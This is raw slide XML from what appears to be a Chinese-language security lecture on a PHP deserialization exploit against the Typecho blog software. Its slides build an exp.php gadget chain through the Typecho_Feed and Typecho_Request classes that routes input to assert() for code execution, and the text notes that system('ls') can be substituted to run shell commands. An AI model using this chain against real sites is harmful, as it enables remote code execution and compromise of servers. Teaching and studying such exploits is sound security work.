              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>因此，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>adapter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>”的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>应该为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>Typecho_Feed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1244799" y="4408413"/>
          <a:ext cx="10229028" cy="2376264"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="2376264">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array(</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    'adapter' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a: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effectLst/>
                        </a:rPr>
                        <a:t>echo base64_encode(serialize($</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>));</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="28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56767" y="447973"/>
            <a:ext cx="11089233" cy="356509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Item</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author</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应该是什么？应该是</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1532831" y="3609984"/>
          <a:ext cx="10229028" cy="3291840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="2899048">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $item;	</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        $this-&gt;item = array(</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>            'author' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(),</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        );</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="24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56767" y="447973"/>
            <a:ext cx="11089233" cy="2672543"/>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并成功利用？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如何充分利用</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通过构造函数实现两个私有变量的赋值</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Filter[0]</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是要调用的函数；（</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是要输入的参数。</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951720" y="3328293"/>
          <a:ext cx="10229028" cy="3291840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="2899048">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_filter = array();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>['</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>screenName</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>'] = '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>phpinfo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>()';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>$this-&gt;_filter[0] = 'assert';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}    </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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759" y="952029"/>
            <a:ext cx="11123116" cy="461664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上述代码中用到了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430" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>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函数的参数是字符串，那么该字符串会被</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当做</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代码执行</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430" lvl="1" indent="-514350">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>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这一点和</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一句话木马常用的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函数有相似之处。</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便是我们执行的</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如果想要执行系统命令，将</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替换为</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system(‘</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ls</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即可。注意最后有一个分号。</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2791" y="663997"/>
            <a:ext cx="10657184" cy="456551"/>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根据上述思路，写出对应的利用代码：</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1175098" y="1384077"/>
          <a:ext cx="10229028" cy="512064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a:effectLst/>
                        </a:rPr>
                        <a:t>/*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>exp.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>*/</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Feed</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $item;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        $this-&gt;item = array(</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>            'author' =&gt; new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a: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solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>        );</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFF00"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    }</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="28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172791" y="591989"/>
          <a:ext cx="10229028" cy="5974080"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="10229028"/>
              </a:tblGrid>
              <a:tr h="4032448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Typecho_Request</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>params</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = array();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    private $_filter = array();</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2800" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>    public function __construct(){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" kern="100" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
